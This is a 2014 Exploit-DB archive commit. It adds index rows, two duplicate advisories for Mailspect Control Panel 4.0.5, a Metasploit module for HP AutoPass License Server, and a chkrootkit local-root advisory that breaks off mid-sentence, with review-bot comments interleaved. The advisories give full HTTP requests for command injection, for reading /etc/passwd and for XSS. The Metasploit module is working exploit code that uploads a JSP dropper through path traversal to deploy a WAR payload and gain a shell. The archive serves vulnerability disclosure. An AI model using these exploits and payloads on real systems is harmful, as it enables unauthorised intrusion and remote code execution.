Updated 06_29_2014

Offensive Security 2014-06-29 04:38:54 +00:00
parent adfb91d89a
commit bf1d5f6e68
22 changed files with 1873 additions and 0 deletions


@ -30506,6 +30506,7 @@ id,file,description,date,author,platform,type,port
33866,platforms/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password CSRF",2014-06-25,nopesled,hardware,webapps,0
33867,platforms/php/webapps/33867.txt,"Lunar CMS 3.3 Unauthenticated Remote Command Execution Exploit",2014-06-25,LiquidWorm,php,webapps,0
33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 Source Code Information Disclosure Vulnerability",2010-04-22,"Veerendra G.G",multiple,remote,0
33869,platforms/hardware/remote/33869.txt,"Huawei EchoLife HG520 3.10.18.5-1.0.5.0 - Remote Information Disclosure Vulnerability",2010-04-22,hkm,hardware,remote,0
33870,platforms/php/webapps/33870.txt,"FlashCard 2.6.5 'id' Parameter Cross Site Scripting Vulnerability",2010-04-22,Valentin,php,webapps,0
33871,platforms/multiple/remote/33871.txt,"Tiny Java Web Server 1.71 Multiple Input Validation Vulnerabilities",2010-04-08,"cp77fk4r ",multiple,remote,0
33873,platforms/multiple/remote/33873.txt,"HP System Management Homepage 'RedirectUrl' Parameter URI Redirection Vulnerability",2010-04-25,"Aung Khant",multiple,remote,0
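Review bot: the author field on the 33871 row is quoted with a trailing space ("cp77fk4r "), unlike every other author value in this hunk; an exact-match lookup on the author column will miss this entry, so trim it to "cp77fk4r".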
@ -30522,3 +30523,23 @@ id,file,description,date,author,platform,type,port
33884,platforms/php/webapps/33884.txt,"Zikula Application Framework 1.2.2 ZLanguage.php lang Parameter XSS",2010-04-13,"High-Tech Bridge SA",php,webapps,0
33885,platforms/php/webapps/33885.txt,"Zikula Application Framework 1.2.2 index.php func Parameter XSS",2010-04-13,"High-Tech Bridge SA",php,webapps,0
33886,platforms/linux/dos/33886.txt,"Linux Kernel 'find_keyring_by_name()' Local Memory Corruption Vulnerability",2010-04-27,"Toshiyuki Okajima",linux,dos,0
33887,platforms/cgi/webapps/33887.txt,"Mailspect Control Panel 4.0.5 - Multiple Vulnerabilities",2014-06-27,"Onur Alanbel (BGA)",cgi,webapps,0
33888,platforms/php/webapps/33888.txt,"ProArcadeScript 'search.php' Cross Site Scripting Vulnerability",2010-04-27,Sid3^effects,php,webapps,0
33889,platforms/php/webapps/33889.txt,"SmartBlog 1.3 SQL Injection and Cross Site Scripting Vulnerabilities",2010-04-27,indoushka,php,webapps,0
33890,platforms/windows/remote/33890.txt,"OneHTTPD 0.6 Directory Traversal Vulnerability",2010-04-27,"John Leitch",windows,remote,0
33891,platforms/java/remote/33891.rb,"HP AutoPass License Server File Upload",2014-06-27,metasploit,java,remote,5814
33892,platforms/windows/local/33892.rb,"MS14-009 .NET Deployment Service IE Sandbox Escape",2014-06-27,metasploit,windows,local,0
33893,platforms/windows/local/33893.rb,"MS13-097 Registry Symlink IE Sandbox Escape",2014-06-27,metasploit,windows,local,0
33894,platforms/multiple/webapps/33894.txt,"Python CGIHTTPServer Encoded Path Traversal",2014-06-27,"RedTeam Pentesting",multiple,webapps,0
33895,platforms/cgi/webapps/33895.txt,"Mailspect Control Panel 4.0.5 - Multiple Vulnerabilities",2014-06-27,"BGA Security",cgi,webapps,20001
33896,platforms/php/webapps/33896.txt,"Wordpress Simple Share Buttons Adder Plugin 4.4 - Multiple Vulnerabilities",2014-06-27,dxw,php,webapps,80
33897,platforms/multiple/webapps/33897.txt,"Endeca Latitude 2.2.2 - CSRF Vulnerability",2014-06-27,"RedTeam Pentesting",multiple,webapps,0
33899,platforms/linux/local/33899.txt,"chkrootkit 0.49 - Local Root Vulnerability",2014-06-28,"Thomas Stangner",linux,local,0
33900,platforms/windows/remote/33900.pl,"Serenity Audio Player 3.2.3 '.m3u' File Buffer Overflow Vulnerability",2010-04-26,Madjix,windows,remote,0
33901,platforms/windows/remote/33901.rb,"Serenity Audio Player 3.2.3 '.m3u' File Buffer Overflow Vulnerability (meta)",2010-04-26,blake,windows,remote,0
33904,platforms/linux/local/33904.txt,"check_dhcp 2.0.2 (Nagios Plugins) - Arbitrary Option File Read Race Condition Exploit",2014-06-28,"Dawid Golunski",linux,local,0
33905,platforms/multiple/remote/33905.txt,"Apache ActiveMQ 5.3 'admin/queueBrowse' Cross Site Scripting Vulnerability",2010-04-28,"arun kethipelly",multiple,remote,0
33906,platforms/php/webapps/33906.txt,"velBox 1.2 Insecure Cookie Authentication Bypass Vulnerability",2010-04-28,indoushka,php,webapps,0
33907,platforms/multiple/remote/33907.txt,"ZKSoftware 'ZK5000' Remote Information Disclosure Vulnerability",2010-03-20,fb1h2s,multiple,remote,0
33908,platforms/php/webapps/33908.txt,"Your Articles Directory Login Option SQL Injection Vulnerability",2010-04-29,Sid3^effects,php,webapps,0
33909,platforms/php/webapps/33909.txt,"Tele Data's Contact Management Server 0.9 'username' Parameter SQL Injection Vulnerability",2010-04-28,"John Leitch",php,webapps,0
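Review bot: rows 33887 and 33895 carry the same description, "Mailspect Control Panel 4.0.5 - Multiple Vulnerabilities", on the same date and differ only in author ("Onur Alanbel (BGA)" versus "BGA Security") and port (0 versus 20001), and the two files added later in this commit are near-identical; keep one row (with port 20001, which is the port in the PoC Host headers) so searches do not return the same advisory twice. Minor: "Wordpress" on the 33896 row should be "WordPress".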

platforms/cgi/webapps/33887.txt Executable file

@ -0,0 +1,147 @@
Document Title:
============
Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities
Release Date:
===========
June 21, 2014
Product & Service Introduction:
========================
Mailspect is the email security and archiving brand of RAE Internet Inc., Tarrytown, New York. The Mailspect product suite was launched
in 2005 as a Control Panel for Open Source antispam and antivirus scanning engines such as Clamd and Spamassassin.
Mailspect Defense offered easy-to-use configuration and update tools and an integrated Quaratine Solution and Mail Filter. Subsequently,
the Control Panel has expanded to include commercial scanning engines such as Cloudmark, ESET, F-FROT, Mailshell, and Sophos and built-in
content filers and reputation engines.
Abstract Advisory Information:
=======================
BGA Team discovered a remote code execution, two arbitrary file read and one cross site scripting vulnerability in Mailspect Control Panel
4.0.5 web application.
Vulnerability Disclosure Timeline:
=========================
May 4, 2014 : Contact with Vendor
May 16, 2014 : Vendor Response
June 21, 2014 : Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Multilayered Email Security & Archive for Gateways, MTA's & Servers
Product: Mailspect Control Panel 4.0.5
Other versions may be affected.
Exploitation Technique:
==================
RCE: Remote, Authenticated
AFR: Remote, Authenticated
XSS: Remote, Unauthenticated
Severity Level:
===========
High
Technical Details & Description:
========================
1. Sending a POST request to "/system_module.cgi" with config_version_cmd parameter's value set to a linux command group like "whoami >
/tmp/who; /usr/local/MPP/mppd -v" causes the former command's execution by sending a GET request (or simply visiting) to
"status_info.cgi?group=default" page.
Other parameters with the suffix "_cmd" are probably vulnerable.
2. Sending a GET request to "/monitor_logs_ctl.cgi" with log_dir parameter's value set to "/" and log_file's value set to an arbitrary
file name like "/etc/passwd" will cause the file's content's disclosure.
3. Sending a POST request to "/monitor_manage_logs.cgi" with log_file parameter's value set to an arbitrary file name like "/etc/passwd"
will cause the file's content's disclosure.
4. Sending a POST request to "/monitor_manage_logs.cgi" with login parameter's value set to "></script>js to be executed<script/> leads
the Javascript code's execution.
Proof of Concept (PoC):
==================
Proof of Concept RCE Request:
POST /system_module.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/system_module.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1282
post=1&config_mppd_conf=%2Fusr%2Flocal%2FMPP%2Fmppd.conf.xml&config_language=&config_log_dir=%2Fvar%2Flog%2FMPP%2F&config_version_cmd=whoami+%3E+%2Ftmp%2Fwho%3B+%2Fusr%2Flocal%2FMPP%2Fmppd+-v&config_licence_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-l+%2Fusr%2Flocal%2FMPP%2Fkey.txt&config_start_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd&config_stop_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-s&config_restart_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-r&config_sophos_daily=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fsophosdaily.sh&config_sophos_monthly=%2Fusr%2Flocal%2FMPP%2Fscripts%2Fsophosmonthly.pl&config_fprot_update=%2Fusr%2Flocal%2Ff-prot%2Ftools%2Fcheck-updates.pl&config_cloudmark_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fcloudmarkupdate.sh&config_cgate_submitted=%2Fvar%2FCommuniGate%2FSubmitted&config_clamav_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fclamavupdate.sh&config_cloudmark_dir=%2Fusr%2Flocal%2FMPP%2Fcloudmark&config_mailshell_dir=%2Fusr%2Flocal%2FMPP%2Fmailshell&config_fprot_dir=&config_pid_file=%2Fvar%2Frun%2Fmppd.pid&config_mailshell_update=%2Fusr%2Flocal%2FMPP%2Fmailshellupdate&config_mpp_parser_log_dir=%2Fvar%2Flog%2FMPP%2F%2Fplog&config_mpp_parser_time_interval=20&page_refresh=60
2. Proof of Concept AFR Request 1:
GET /monitor_logs_ctl.cgi?log_file=/etc/passwd&log_dir=/&mode=tail&lines=50&filter=&dummy=0.4426060212816081 HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/monitor_realtime_logs.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
3. Proof of Concept AFR Request 2:
POST /monitor_manage_logs.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/monitor_manage_logs.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
group=default&post=1&log_file=/etc/passwd&download=Download&save_to_dir=&tar_gzip=on
4. Proof of Concept XSS Request:
GET /login.cgi?login=abc%22%3E%3Cscript%3Ealert(/bga/)%3C/script%3E HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Solution Fix & Patch:
================
XSS will be patched at version 4.0.7
There will be no patch for RCE and AFR vulnerabilities as stated at the vendors reply.
Security Risk:
==========
The risk of the vulnerabilities above estimated as high.
Credits & Authors:
==============
Bilgi Guvenligi AKADEMISI - Onur ALANBEL, Ender AKBA?
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
Domain: www.bga.com.tr/advisories.html
Social: twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2014 | BGA Security
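Review bot: item 4 of the technical description says the XSS is triggered by a POST to "/monitor_manage_logs.cgi" with the login parameter, but the PoC XSS request is `GET /login.cgi?login=abc%22%3E%3Cscript%3E...`; the description should name the same endpoint and method as the request it documents, since readers and signature writers key on it. Two smaller points: the Solution section states that the RCE and file-read issues will not be patched, so a workaround for operators belongs there (restrict port 20001 to trusted administrative hosts, and treat every "_cmd" setting saved through system_module.cgi as an admin-only, audited change); and the credits line has lost a non-ASCII character ("Ender AKBA?"), so the file should be saved as UTF-8.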

platforms/cgi/webapps/33895.txt Executable file

@ -0,0 +1,147 @@
Document Title:
============
Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities
Release Date:
===========
June 21, 2014
Product & Service Introduction:
========================
Mailspect is the email security and archiving brand of RAE Internet Inc., Tarrytown, New York. The Mailspect product suite was launched
in 2005 as a Control Panel for Open Source antispam and antivirus scanning engines such as Clamd and Spamassassin.
Mailspect Defense offered easy-to-use configuration and update tools and an integrated Quaratine Solution and Mail Filter. Subsequently,
the Control Panel has expanded to include commercial scanning engines such as Cloudmark, ESET, F-FROT, Mailshell, and Sophos and built-in
content filers and reputation engines.
Abstract Advisory Information:
=======================
BGA Team discovered a remote code execution, two arbitrary file read and one cross site scripting vulnerability in Mailspect Control Panel
4.0.5 web application.
Vulnerability Disclosure Timeline:
=========================
May 4, 2014 : Contact with Vendor
May 16, 2014 : Vendor Response
June 21, 2014 : Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Multilayered Email Security & Archive for Gateways, MTA's & Servers
Product: Mailspect Control Panel 4.0.5
Other versions may be affected.
Exploitation Technique:
==================
RCE: Remote, Authenticated
AFR: Remote, Authenticated
XSS: Remote, Unauthenticated
Severity Level:
===========
High
Technical Details & Description:
========================
1. Sending a POST request to "/system_module.cgi" with config_version_cmd parameter's value set to a linux command group like "whoami >
/tmp/who; /usr/local/MPP/mppd -v" causes the former command's execution by sending a GET request (or simply visiting) to
"status_info.cgi?group=default" page.
Other parameters with the suffix "_cmd" are probably vulnerable.
2. Sending a GET request to "/monitor_logs_ctl.cgi" with log_dir parameter's value set to "/" and log_file's value set to an arbitrary
file name like "/etc/passwd" will cause the file's content's disclosure.
3. Sending a POST request to "/monitor_manage_logs.cgi" with log_file parameter's value set to an arbitrary file name like "/etc/passwd"
will cause the file's content's disclosure.
4. Sending a POST request to "/monitor_manage_logs.cgi" with login parameter's value set to "></script>js to be executed<script/> leads
the Javascript code's execution.
Proof of Concept (PoC):
==================
Proof of Concept RCE Request:
POST /system_module.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/system_module.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1282
post=1&config_mppd_conf=%2Fusr%2Flocal%2FMPP%2Fmppd.conf.xml&config_language=&config_log_dir=%2Fvar%2Flog%2FMPP%2F&config_version_cmd=whoami+%3E+%2Ftmp%2Fwho%3B+%2Fusr%2Flocal%2FMPP%2Fmppd+-v&config_licence_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-l+%2Fusr%2Flocal%2FMPP%2Fkey.txt&config_start_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd&config_stop_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-s&config_restart_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-r&config_sophos_daily=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fsophosdaily.sh&config_sophos_monthly=%2Fusr%2Flocal%2FMPP%2Fscripts%2Fsophosmonthly.pl&config_fprot_update=%2Fusr%2Flocal%2Ff-prot%2Ftools%2Fcheck-updates.pl&config_cloudmark_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fcloudmarkupdate.sh&config_cgate_submitted=%2Fvar%2FCommuniGate%2FSubmitted&config_clamav_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fclamavupdate.sh&config_cloudmark_dir=%2Fusr%2Flocal%2FMPP%2Fcloudmark&config_mailshell_dir=%2Fusr%2Flocal%2FMPP%2Fmailshell&config_fprot_dir=&config_pid_file=%2Fvar%2Frun%2Fmppd.pid&config_mailshell_update=%2Fusr%2Flocal%2FMPP%2Fmailshellupdate&config_mpp_parser_log_dir=%2Fvar%2Flog%2FMPP%2F%2Fplog&config_mpp_parser_time_interval=20&page_refresh=60
2. Proof of Concept AFR Request 1:
GET /monitor_logs_ctl.cgi?log_file=/etc/passwd&log_dir=/&mode=tail&lines=50&filter=&dummy=0.4426060212816081 HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/monitor_realtime_logs.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
3. Proof of Concept AFR Request 2:
POST /monitor_manage_logs.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/monitor_manage_logs.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
group=default&post=1&log_file=/etc/passwd&download=Download&save_to_dir=&tar_gzip=on
4. Proof of Concept XSS Request:
GET /login.cgi?login=abc%22%3E%3Cscript%3Ealert(/bga/)%3C/script%3E HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Solution Fix & Patch:
================
XSS will be patched at version 4.0.7
There will be no patch for RCE and AFR vulnerabilities as stated at the vendor's reply.
Security Risk:
==========
The risk of the vulnerabilities above estimated as high.
Credits & Authors:
==============
Bilgi Guvenligi AKADEMISI - Onur ALANBEL, Ender AKBAÞ
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
Domain: www.bga.com.tr/advisories.html
Social: twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2014 | BGA Security
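Review bot: this file is a second copy of platforms/cgi/webapps/33887.txt added in the same commit, with the same title, release date, timeline, technical details and PoC requests; the only differences are the apostrophe in "vendor's" on the fix line and the mis-encoded surname in the credits ("AKBAÞ" here, "AKBA?" in 33887.txt). Keep a single copy under one ID and drop the other row from files.csv so the archive does not carry two entries for one advisory.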


@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/39646/info
The Huawei EchoLife HG520 is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
The following Huawei EchoLife HG520 firmware and software versions are vulnerable:
Firmware 3.10.18.7-1.0.7.0, 3.10.18.5-1.0.7.0, 3.10.18.4
Software Versions: V100R001B120Telmex, V100R001B121Telmex
http://www.exploit-db.com/sploits/33869.tar.gz
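Review bot: the firmware versions listed here (3.10.18.7-1.0.7.0, 3.10.18.5-1.0.7.0, 3.10.18.4) do not match the version in the files.csv description for 33869, "3.10.18.5-1.0.5.0"; one of the two should be corrected so an operator comparing a device against the index gets the right answer. The entry also says only that "sensitive information" is disclosed and points to a tarball; a one-line statement of what is exposed and whether a firmware update fixes it would make the record usable without unpacking the archive.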

platforms/java/remote/33891.rb Executable file

@ -0,0 +1,196 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'HP AutoPass License Server File Upload',
'Description' => %q{
This module exploits a code execution flaw in HP AutoPass License Server. It abuses two
weaknesses in order to get its objective. First, the AutoPass application doesn't enforce
authentication in the CommunicationServlet component. On the other hand, it's possible to
abuse a directory traversal when uploading files thorough the same component, allowing to
upload an arbitrary payload embedded in a JSP. The module has been tested successfully on
HP AutoPass License Server 8.01 as installed with HP Service Virtualization 3.50.
},
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-6221'],
['ZDI', '14-195'],
['BID', '67989'],
['URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04333125']
],
'Privileged' => true,
'Platform' => %w{ java },
'Arch' => ARCH_JAVA,
'Targets' =>
[
['HP AutoPass License Server 8.01 / HP Service Virtualization 3.50', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 10 2014'))
register_options(
[
Opt::RPORT(5814),
OptString.new('TARGETURI', [true, 'Path to HP AutoPass License Server Application', '/autopass']),
OptInt.new('INSTALL_DEPTH', [true, 'Traversal Depth to reach the HP AutoPass License Server folder', 4]),
OptInt.new('WEBAPPS_DEPTH', [true, 'Traversal Depth to reach the Tomcat webapps folder', 1])
], self.class)
end
def check
check_code = Exploit::CheckCode::Safe
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path.to_s, "cs","pdfupload"),
'method' => 'POST'
})
unless res
check_code = Exploit::CheckCode::Unknown
end
if res && res.code == 500 &&
res.body.to_s.include?("HP AutoPass License Server") &&
res.body.to_s.include?("java.lang.NullPointerException") &&
res.body.to_s.include?("com.hp.autopass")
check_code = Exploit::CheckCode::Detected
end
check_code
end
def exploit
app_base = rand_text_alphanumeric(4+rand(32-4))
war = payload.encoded_war({ :app_name => app_base }).to_s
war_filename = "#{app_base}.war"
# By default, the working directory when executing the JSP is:
# C:\Program Files\HP\HP AutoPass License Server\HP AutoPass License Server\HP AutoPass License Server\bin
# The war should be dropped to the next location to autodeploy:
# C:\Program Files\HP\HP AutoPass License Server\HP AutoPass License Server\HP AutoPass License Server\webapps
war_traversal = webapps_traversal
war_traversal << "webapps/#{war_filename}"
dropper = jsp_drop_bin(war, war_traversal)
dropper_filename = rand_text_alpha(8) + ".jsp"
print_status("#{peer} - Uploading the JSP dropper #{dropper_filename}...")
# The JSP, by default, is uploaded to:
# C:\Program Files\HP\HP AutoPass License Server\AutoPass\LicenseServer\conf\pdfiles\
# In order to execute it, through the AutoPass application we would like to drop it here:
# C:\Program Files\HP\HP AutoPass License Server\HP AutoPass License Server\HP AutoPass License Server\webapps\autopass\scripts
dropper_traversal = install_traversal
dropper_traversal << "/HP AutoPass License Server/HP AutoPass License Server/webapps/autopass/scripts/#{dropper_filename}"
res = upload_file(dropper_traversal, dropper)
register_files_for_cleanup("#{webapps_traversal}webapps/autopass/scripts/#{dropper_filename}")
register_files_for_cleanup("#{webapps_traversal}webapps/#{war_filename}")
unless res && res.code == 500 &&
res.body.to_s.include?("HP AutoPass License Server") &&
res.body.to_s.include?("java.lang.NullPointerException") &&
res.body.to_s.include?("com.hp.autopass")
print_error("#{peer} - Unexpected response... upload maybe failed, trying anyway...")
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "scripts", dropper_filename),
'method' => 'GET'
})
unless res and res.code == 200
print_error("#{peer} - Unexpected response after executing the dropper...")
end
10.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi(
{
'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8) + ".jsp"),
'method' => 'GET'
})
# Failure. The request timed out or the server went away.
break if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
def webapps_traversal
"../" * datastore['WEBAPPS_DEPTH']
end
def install_traversal
"/.." * datastore['INSTALL_DEPTH']
end
# Using a JSP dropper because the vulnerability doesn't allow to upload
# 'binary' files, so a WAR can't be uploaded directly.
def jsp_drop_bin(bin_data, output_file)
jspraw = %Q|<%@ page import="java.io.*" %>\n|
jspraw << %Q|<%\n|
jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
jspraw << %Q|int numbytes = data.length();\n|
jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
jspraw << %Q|{\n|
jspraw << %Q| char char1 = (char) data.charAt(counter);\n|
jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n|
jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n|
jspraw << %Q| comb <<= 4;\n|
jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n|
jspraw << %Q| bytes[counter/2] = (byte)comb;\n|
jspraw << %Q|}\n|
jspraw << %Q|outputstream.write(bytes);\n|
jspraw << %Q|outputstream.close();\n|
jspraw << %Q|%>\n|
jspraw
end
def upload_file(file_name, contents)
post_data = Rex::MIME::Message.new
post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadedFile\"; filename=\"#{file_name}\"")
data = post_data.to_s
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path.to_s, "cs","pdfupload"),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
res
end
end
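Review bot: the header comment URL "http//metasploit.com/download" is missing the colon after the scheme. In exploit, `unless res and res.code == 200` uses the low-precedence `and` where check and the earlier `unless` in exploit use `&&`; it works here but is inconsistent. When the trigger loop ends on `break if res.nil?` nothing is printed, unlike the error paths above it, so a failed run gives no hint of why it stopped; a print_error there would help. For defenders, the check method documents the fingerprint worth alerting on: an unauthenticated POST to <TARGETURI>/cs/pdfupload answered with a 500 whose body contains java.lang.NullPointerException, and any multipart upload to that servlet whose filename part contains traversal sequences.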

platforms/linux/local/33899.txt Executable file

@ -0,0 +1,68 @@
We just found a serious vulnerability in the chkrootkit package, which
may allow local attackers to gain root access to a box in certain
configurations (/tmp not mounted noexec).
The vulnerability is located in the function slapper() in the
shellscript chkrootkit:
#
# SLAPPER.{A,B,C,D} and the multi-platform variant
#
slapper (){
SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c"
SLAPPER_FILES="$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd \
${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b"a
SLAPPER_PORT="0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 "
OPT=-an
STATUS=0
file_port=
if ${netstat} "${OPT}"|${egrep} "^tcp"|${egrep} "${SLAPPER_PORT}">
/dev/null 2>&1
then
STATUS=1
[ "$SYSTEM" = "Linux" ] && file_port=`netstat -p ${OPT} | \
$egrep ^tcp|$egrep "${SLAPPER_PORT}" | ${awk} '{ print $7 }' |
tr -d :`
fi
for i in ${SLAPPER_FILES}; do
if [ -f ${i} ]; then
file_port=$file_port $i
STATUS=1
fi
done
if [ ${STATUS} -eq 1 ] ;then
echo "Warning: Possible Slapper Worm installed ($file_port)"
else
if [ "${QUIET}" != "t" ]; then echo "not infected"; fi
return ${NOT_INFECTED}
fi
}
The line 'file_port=$file_port $i' will execute all files specified in
$SLAPPER_FILES as the user chkrootkit is running (usually root), if
